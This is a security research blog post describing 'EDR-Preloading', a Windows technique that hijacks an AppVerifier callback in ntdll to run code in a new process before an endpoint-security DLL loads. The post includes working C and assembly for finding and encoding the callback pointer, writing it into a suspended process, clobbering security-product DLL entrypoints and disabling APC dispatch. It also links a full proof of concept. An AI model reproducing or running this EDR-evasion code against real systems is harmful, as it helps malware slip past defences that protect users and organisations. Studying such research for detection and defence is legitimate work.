Bypassing EDRs With EDR-Preloading


Previously, I wrote an article detailing how system calls can be used to bypass user mode EDR hooks.
Now, I want to introduce an alternative technique, “EDR-Preloading”, which involves running malicious code before the EDR’s DLL is loaded into the process, enabling us to prevent it from running at all.
By neutralizing the EDR module, we can freely call functions normally without having to worry about user mode hooks, and therefore don’t need to rely on direct or indirect syscalls.

This technique makes use of some assumptions and flaws in the way EDRs load their user mode component.
The EDR needs to inject its DLL into every process in order to hook user mode functions, but run the DLL too early and the process will crash, run it too late and the process may have already executed malicious code.
The sweet spot most EDRs have gone with is starting their DLL as late in process initialization as possible, whilst still being able to do everything they need before the process entrypoint is called.

Theoretically, all we need is to find a way to load code a little bit earlier in process initialization, then we can preempt the EDR.

To understand when EDR DLLs can and can’t load, we need to understand a bit about process initialization.

Whenever a new process is created, the kernel maps the target executable’s image into memory along with ntdll.dll.
A single thread is then created, which will eventually serve as the entrypoint thread.
At this point, the process is just an empty shell (the PEB, TEB, and imports are all uninitialized). Before the process entrypoint can be called, a fair bit of setup must be performed.

Whenever a new thread starts, its start address will be set to ntdll!LdrInitializeThunk(), which is responsible for calling ntdll!LdrpInitialize().

ntdll!LdrpInitialize() has two purposes:

Initialize the process (if it’s not already initialized)
Initialize the thread

ntdll!LdrpInitialize() first checks the global variable ntdll!LdrpProcessInitialized, which, if set to FALSE, will result in a call to ntdll!LdrpInitializeProcess() prior to thread initialization.

ntdll!LdrpInitializeProcess() does what it says on the tin. It’ll set up the PEB, resolve the process imports, and load any required DLLs.

Right at the end of ntdll!LdrpInitialize() is a call to ntdll!ZwTestAlert(), which is the function used to run all the Asynchronous Procedure Calls (APCs) in the current thread’s APC queue.
EDR drivers that inject code into the target process and call it via ntoskrnl!NtQueueApcThread() will see their code executed here.

Once the thread and process initialization is complete and ntdll!LdrpInitialize() returns, ntdll!LdrInitializeThunk() will call ntdll!ZwContinue(), which transfers execution back to the kernel.
The kernel will then set the thread instruction pointer to point to ntdll!RtlUserThreadStart(), which will call the executable entrypoint, and the process’s life officially begins.
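
The ordering described above can be sketched as a toy model in C. This is only an illustration of the sequence, not loader code: nothing here calls into Windows, the stage labels are plain strings, and simulate_thread_start() and record() are hypothetical names made up for the sketch.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Toy model only: stands in for ntdll!LdrpProcessInitialized. */
static int process_initialized = 0;

/* Appends a stage label to the trace, separated by '>'. */
static void record(char *trace, size_t cap, const char *stage) {
    assert(strlen(trace) + strlen(stage) + 2 < cap);
    if (trace[0] != '\0') strcat(trace, ">");
    strcat(trace, stage);
}

/* Simulates one thread passing through LdrInitializeThunk(). */
void simulate_thread_start(char *trace, size_t cap) {
    if (!process_initialized) {
        /* only the first thread pays for process initialization */
        record(trace, cap, "LdrpInitializeProcess");
        process_initialized = 1;
    }
    record(trace, cap, "thread-init");
    record(trace, cap, "ZwTestAlert");         /* queued APCs run here */
    record(trace, cap, "ZwContinue");          /* back to the kernel */
    record(trace, cap, "RtlUserThreadStart");  /* calls the entrypoint */
}
```

Calling simulate_thread_start() twice shows the point that matters for the rest of the article: process initialization appears only in the first trace, and anything that runs inside it runs before the APC stage.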

Process initialization flow chart

Early APC queuing

Since APCs execute in first-in, first-out order, it’s sometimes possible to preempt certain EDRs by queueing your own APC first.
Many EDRs monitor for new processes by registering a kernel callback using ntoskrnl!PsSetLoadImageNotifyRoutine().
Whenever a new process starts, it automatically loads ntdll.dll and kernel32.dll, so this serves as a good way to detect when new processes are being initialized.
By starting a process in a suspended state, you can queue an APC prior to initialization, therefore ending up at the front of the queue.
This technique is sometimes known as “Early Bird injection”.

The problem with queuing APCs is that they have long been used for code injection, therefore ntdll!NtQueueApcThread() is hooked and monitored by most EDRs.
Queuing an APC into a suspended process is highly suspicious and also well documented. It’s also possible the EDR could hook your APC, re-order the APC queue, or do any manner of other things to ensure its DLL runs first.

TLS Callback

TLS callbacks are executed towards the end of ntdll!LdrpInitializeProcess(), but prior to ntdll!ZwTestAlert(), so they run before any APCs.
In cases where an application uses a TLS callback, some EDRs may inject code to intercept the callback, or load the EDR DLL slightly earlier to compensate.
Much to my surprise, one of the EDRs I tested on was still bypassable using a TLS callback.

My goal was simple, but actually not simple at all, and also very time-consuming.
I wanted to find a way to execute code before the entrypoint, before TLS callbacks, before anything that could possibly interfere with my code.
This meant reverse engineering the entire process and DLL loader to look for anything I could use. In the end, I found exactly what I needed.

Behold, the AppVerifier and ShimEngine interfaces

Long ago, Microsoft created a tool called AppVerifier, for, well, app verification.
It’s designed to monitor applications at runtime for bugs, compatibility issues, and so on.
Much of AppVerifier’s functionality is facilitated by the addition of a whole host of new callbacks inside ntdll.

Whilst reverse engineering the AppVerifier layer, I actually found two sets of useful callbacks (AppVerifier and ShimEngine).

Shim Engine related variables

App Verifier related variables

Two pointers that caught my eye were ntdll!g_pfnSE_GetProcAddressForCaller and ntdll!AvrfpAPILookupCallbackRoutine, part of the ShimEngine and AppVerifier layers respectively.
Both pointers are called towards the end of ntdll!LdrGetProcedureAddressForCaller(), which is the function used internally by GetProcAddress() to resolve the address of exported functions.

The code in LdrGetProcedureAddressForCaller() which implements the callbacks

These callbacks are perfect because LdrGetProcedureAddress() is guaranteed to be called by LdrpInitializeProcess() when it loads kernelbase.dll.
It’s also called any time anything tries to resolve an export with GetProcAddress() / LdrGetProcedureAddress(), including the EDR, which has a lot of fun potential.
Even better, these pointers exist in a memory section that’s writable prior to process initialization.

Deciding on a callback to hook

Whilst there were many good options, I decided to go with AvrfpAPILookupCallbackRoutine, which appears to have been introduced in Windows 8.1.
Whilst I could use the older callbacks for compatibility with earlier Windows versions, it’d be a lot more work and I wanted to keep my PoC simple.

The rest of the AppVerifier interface requires that you install a “Verifier Provider”, which requires a ton of memory manipulation.
The ShimEngine is slightly easier, but setting g_ShimsEnabled to TRUE enables all callbacks, not just the one we want, so we must register every callback or the application will crash.

The newer AvrfpAPILookupCallbackRoutine is very nice for two reasons:

It can be enabled independently of the AppVerifier interface by setting ntdll!AvrfpAPILookupCallbacksEnabled, so no AppVerifier provider is needed.
Both ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine are easily locatable in memory, especially on Windows 10.

For demonstration purposes I decided to build a proof-of-concept that uses the AvrfpAPILookupCallbackRoutine callback to load before the EDR DLL, then prevent it from loading.
So far, I’ve only tested it on two major EDRs, but it should theoretically work against any EDR code injection with a few tweaks.

You can find the full source code at the bottom of the article.

Step 1: locating the AppVerifier callback pointer

In order to set up a callback we need to set ntdll!AvrfpAPILookupCallbacksEnabled and ntdll!AvrfpAPILookupCallbackRoutine.
On Windows 10, both variables are located towards the beginning of ntdll’s .mrdata section, which is writable during process initialization.

ntdll!AvrfpAPILookupCallbacksEnabled is found directly after ntdll!LdrpMrdataBase (though sometimes ntdll!LdrpKnownDllDirectoryHandle sits before it).

Both variables seem to always be exactly 8 bytes apart and in the same order.
In an initialized process, the layout should look something like this:

offset+0x00 – ntdll!LdrpMrdataBase (set to base address of .mrdata section)
offset+0x08 – ntdll!LdrpKnownDllDirectoryHandle (set to a non-zero value)
offset+0x10 – ntdll!AvrfpAPILookupCallbacksEnabled (set to zero)
offset+0x18 – ntdll!AvrfpAPILookupCallbackRoutine (set to zero)

We can scan the .mrdata section in our own process for a pointer containing the section base address, then the first NULL value after that will be AvrfpAPILookupCallbacksEnabled, with AvrfpAPILookupCallbackRoutine 8 bytes after it.

ULONG_PTR find_avrfp_address(ULONG_PTR mrdata_base) {
    ULONG_PTR address_ptr = mrdata_base + 0x280;  // the pointer we want is 0x280+ bytes in
    ULONG_PTR ldrp_mrdata_base = 0;

    // look for ntdll!LdrpMrdataBase, which holds the base address of .mrdata
    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == mrdata_base) {
            ldrp_mrdata_base = address_ptr;
            break;
        }
        address_ptr += sizeof(LPVOID);  // skip to the next pointer
    }

    // bail out instead of dereferencing a NULL address if LdrpMrdataBase wasn't found
    if (ldrp_mrdata_base == 0) {
        return 0;
    }

    address_ptr = ldrp_mrdata_base;

    // AvrfpAPILookupCallbacksEnabled should be the first NULL pointer after LdrpMrdataBase
    for (int i = 0; i < 10; i++) {
        if (*(ULONG_PTR*)address_ptr == 0) {
            return address_ptr;
        }
        address_ptr += sizeof(LPVOID);  // skip to the next pointer
    }
    return 0;
}

Step 2: setting up the callback to call our malicious code

The easiest way to set up the callback is to just launch a second copy of our own process in a suspended state.
Since ntdll is at the same address in every process, we only need to locate the callback pointer in our own process.
Once our process is launched but in a suspended state, we can just use WriteProcessMemory() to set the pointer.

We could also use this technique for process hollowing, shellcode injection, and more, since it allows us to execute code without creating/hijacking threads, or queuing an APC. But for this PoC we’ll keep it simple.

Note: since many ntdll pointers are encrypted, we can’t just set the pointer to our target address. We have to encrypt it first.
Luckily, the key is the same value and stored at the same location across all processes.

LPVOID encode_system_ptr(LPVOID ptr) {
    // get pointer cookie from SharedUserData!Cookie (0x330)
    ULONG cookie = *(ULONG*)0x7FFE0330;

    // encrypt our pointer so it will work when written to ntdll
    return (LPVOID)_rotr64(cookie ^ (ULONGLONG)ptr, cookie & 0x3F);
}
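
To see why the encoded value round-trips, here is a minimal portable sketch of the same transform with the cookie passed in as a parameter rather than read from SharedUserData. The names encode_ptr(), decode_ptr(), and check_roundtrip() are hypothetical, and the decode step is simply the algebraic inverse of the encode above (rotate left by the same amount, then XOR); it is an assumption for illustration, not code lifted from ntdll.

```c
#include <assert.h>
#include <stdint.h>

/* Portable rotates; the "& 63" on the second shift avoids an undefined
   64-bit shift when the rotation amount is 0. */
static uint64_t rotr64(uint64_t v, unsigned n) {
    n &= 63;
    return (v >> n) | (v << ((64 - n) & 63));
}

static uint64_t rotl64(uint64_t v, unsigned n) {
    n &= 63;
    return (v << n) | (v >> ((64 - n) & 63));
}

/* Same transform as encode_system_ptr(), with an explicit cookie. */
uint64_t encode_ptr(uint64_t ptr, uint32_t cookie) {
    return rotr64((uint64_t)cookie ^ ptr, cookie & 0x3F);
}

/* Inverse of encode_ptr(): undo the rotation, then undo the XOR. */
uint64_t decode_ptr(uint64_t encoded, uint32_t cookie) {
    return rotl64(encoded, cookie & 0x3F) ^ (uint64_t)cookie;
}

/* Sanity check a caller might run once: decoding must return the input. */
void check_roundtrip(uint64_t ptr, uint32_t cookie) {
    assert(decode_ptr(encode_ptr(ptr, cookie), cookie) == ptr);
}
```

Because the cookie is a 32-bit value, only the low 32 bits of the pointer are XORed, and the rotation amount is the cookie’s low 6 bits. A cookie whose low 6 bits are zero therefore degenerates to a plain XOR.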

Now we can just write the pointer and set AvrfpAPILookupCallbacksEnabled to 1 using WriteProcessMemory():

    // ntdll pointers are encoded using the system pointer cookie located at SharedUserData!Cookie
    LPVOID callback_ptr = encode_system_ptr(&My_LdrGetProcedureAddressCallback);

    // value written to ntdll!AvrfpAPILookupCallbacksEnabled to set it to TRUE
    uint8_t bool_true = 1;

    // set ntdll!AvrfpAPILookupCallbackRoutine to our encoded callback address
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)(avrfp_address+8), &callback_ptr, sizeof(ULONG_PTR), NULL)) {
        printf("Write 2 failed, error: %lu\n", GetLastError());
    }

    // set ntdll!AvrfpAPILookupCallbacksEnabled to TRUE
    if (!WriteProcessMemory(pi.hProcess, (LPVOID)avrfp_address, &bool_true, 1, NULL)) {
        printf("Write 3 failed, error: %lu\n", GetLastError());
    }

Step 3: executing the callback & neutralizing the EDR

Once we call ResumeThread() on the suspended process, our callback will be executed every time LdrpGetProcedureAddress() is called, the first of which should be when LdrpInitializeProcess() loads kernelbase.dll.

LdrpInitializeProcess calling LdrLoadDll to load kernelbase.dll

A word of warning: kernelbase.dll is not fully loaded when our callback is fired, and the trigger happens inside LdrLoadDll, thus the loader lock is still acquired.
Kernelbase not yet being loaded means we’re limited to calling only ntdll functions, and the loader lock prevents us from launching any threads or processes, as well as loading DLLs.

Since we’re highly limited in what we can do, the easiest course of action is to just prevent the EDR DLL from loading, then wait until the process is fully initialized before starting the malware party.

To ensure proper neutralization of the EDRs I tested on, I took a multi-pronged approach.

DLL Clobbering

This early in the process lifecycle only ntdll.dll, kernel32.dll, and kernelbase.dll should be loaded.
Some EDRs may preemptively map their DLL into memory, but wait until later to call the entrypoint.
Whilst we could probably unload these DLLs by calling ntdll!LdrUnloadDll() once the loader lock is released (or do it manually), a quick and dirty solution is to just clobber their entrypoints.

What we’ll do is iterate through the LDR module list and just replace the entrypoint address of any DLL that shouldn’t be there.

DWORD EdrParadise() {
    // we'll replace the EDR entrypoint with this equally useful function
    // todo: stop malware

    return ERROR_TOO_MANY_SECRETS;
}

void DisablePreloadedEdrModules() {
    PEB* peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    LIST_ENTRY* list_head = &peb->Ldr->InMemoryOrderModuleList;

    // start at the second entry; the first one is the main executable itself
    LIST_ENTRY* list_entry = list_head->Flink->Flink;

    while (list_entry != list_head) {
        PLDR_DATA_TABLE_ENTRY2 module_entry = CONTAINING_RECORD(list_entry, LDR_DATA_TABLE_ENTRY2, InMemoryOrderLinks);

        // only the below DLLs should be loaded this early, anything else is probably a security product
        if (SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"ntdll.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernel32.dll") != 0 &&
            SafeRuntime::wstring_compare_i(module_entry->BaseDllName.Buffer, L"kernelbase.dll") != 0) {

            module_entry->EntryPoint = &EdrParadise;
        }

        list_entry = list_entry->Flink;
    }
}
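
The snippet above leans on SafeRuntime::wstring_compare_i, which isn’t shown here. Since only ntdll functions are safe to call at this point, a comparison helper needs to avoid the usual runtime imports. Below is a minimal sketch of what such a helper could look like, in plain C. wstr_compare_i() and is_expected_early_module() are hypothetical stand-ins, not the PoC’s actual implementation, and the case folding is ASCII-only on the assumption that module names are ASCII.

```c
#include <assert.h>
#include <stddef.h>

/* ASCII-only lowercase; enough for module names such as "KERNEL32.DLL". */
static wchar_t ascii_lower(wchar_t c) {
    return (c >= L'A' && c <= L'Z') ? (wchar_t)(c - L'A' + L'a') : c;
}

/* Returns 0 when the strings match ignoring ASCII case, non-zero otherwise. */
int wstr_compare_i(const wchar_t *a, const wchar_t *b) {
    assert(a != NULL && b != NULL);
    while (*a != L'\0' && ascii_lower(*a) == ascii_lower(*b)) {
        a++;
        b++;
    }
    /* both at the terminator means equal; anything else is a mismatch */
    return ascii_lower(*a) != ascii_lower(*b);
}

/* Returns 1 if the module is one of the three expected this early. */
int is_expected_early_module(const wchar_t *base_name) {
    static const wchar_t *const expected[] = {
        L"ntdll.dll", L"kernel32.dll", L"kernelbase.dll"
    };
    for (size_t i = 0; i < sizeof(expected) / sizeof(expected[0]); i++) {
        if (wstr_compare_i(base_name, expected[i]) == 0) {
            return 1;
        }
    }
    return 0;
}
```

Keeping the allow-list in one table also makes the three chained comparisons easier to extend if a given Windows build loads an extra system DLL this early.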

Disabling the APC dispatcher

When APCs are queued to a thread they get processed by ntdll!KiUserApcDispatcher(), which runs the APC then calls ntdll!NtContinue() to return the thread to its original context.
By hooking KiUserApcDispatcher and replacing it with our own function that just calls NtContinue() in a loop, no APC queued into our process will ever be dispatched (including those from the EDR’s kernel driver).

; simple APC dispatcher that does everything except dispatch APCs
KiUserApcDispatcher PROC
  _loop:
    call GetNtContinue
    mov rcx, rsp
    mov rdx, 1
    call rax
    jmp _loop
  ret
KiUserApcDispatcher ENDP

Proxying LdrLoadDll calls

By placing a hook on ntdll!LdrLoadDll(), we can monitor which DLLs are being loaded.
If any EDR tries to load its DLL using LdrLoadDll, we can unload or disable it.
Ideally we probably want to hook ntdll!LdrpLoadDll(), which is lower level and called directly by some EDRs, but for simplicity’s sake, we’ll just use LdrLoadDll.

// we can use this hook to prevent new modules from being loaded (though with both EDRs I tested, we don't need to)
NTSTATUS WINAPI LdrLoadDllHook(PWSTR search_path, PULONG dll_characteristics, UNICODE_STRING* dll_name, PVOID* base_address) {
    
    // todo: create a list of DLLs to either be allowed or disallowed
    
    return OriginalLdrLoadDll(search_path, dll_characteristics, dll_name, base_address);
}
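
The todo in the hook could be filled in along the following lines. This is only a sketch under stated assumptions: counted_wstr is a mock of the two UNICODE_STRING fields that matter (a length in bytes and a buffer that may not be NUL-terminated), the deny-list entry "exampleedr.dll" is a made-up name, and base_name_matches() and is_denied() are hypothetical helpers rather than anything from the PoC.

```c
#include <assert.h>
#include <stddef.h>

/* Mock of the UNICODE_STRING fields we need. */
typedef struct {
    unsigned short length_bytes;  /* length in bytes, terminator not counted */
    const wchar_t *buffer;        /* not guaranteed to be NUL-terminated */
} counted_wstr;

static wchar_t ascii_lower(wchar_t c) {
    return (c >= L'A' && c <= L'Z') ? (wchar_t)(c - L'A' + L'a') : c;
}

/* Returns 1 if the file-name part of `path` equals `name` (NUL-terminated),
   ignoring ASCII case. */
int base_name_matches(const counted_wstr *path, const wchar_t *name) {
    assert(path != NULL && path->buffer != NULL && name != NULL);
    size_t len = path->length_bytes / sizeof(wchar_t);
    size_t start = 0;

    /* the base name starts after the last path separator, if any */
    for (size_t i = 0; i < len; i++) {
        if (path->buffer[i] == L'\\' || path->buffer[i] == L'/') {
            start = i + 1;
        }
    }

    size_t i = start;
    while (i < len && *name != L'\0' &&
           ascii_lower(path->buffer[i]) == ascii_lower(*name)) {
        i++;
        name++;
    }
    /* a match requires both strings to be fully consumed */
    return i == len && *name == L'\0';
}

/* Returns 1 if the requested DLL is on the (hypothetical) deny list. */
int is_denied(const counted_wstr *path) {
    static const wchar_t *const deny_list[] = { L"exampleedr.dll" };
    for (size_t n = 0; n < sizeof(deny_list) / sizeof(deny_list[0]); n++) {
        if (base_name_matches(path, deny_list[n])) {
            return 1;
        }
    }
    return 0;
}
```

Comparing by counted length rather than scanning for a terminator matters here because the string handed to LdrLoadDll may be a full path and is described by its length field, so the hook has to strip the directory part itself before matching.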

Whilst this PoC is only designed for Windows 10 64-bit, the technique should be viable on systems at least as early as Windows 7 (I haven’t checked XP or Vista).
However, finding the correct offsets is harder below Windows 10. For a more robust method, I recommend using a disassembler.
Either way, this was a fairly fun weekend project and hopefully someone is able to learn something from it.

If you enjoy my work please follow me on LinkedIn and Mastodon for more.

You can find the full source code here: github.com/MalwareTech/EDR-Preloader
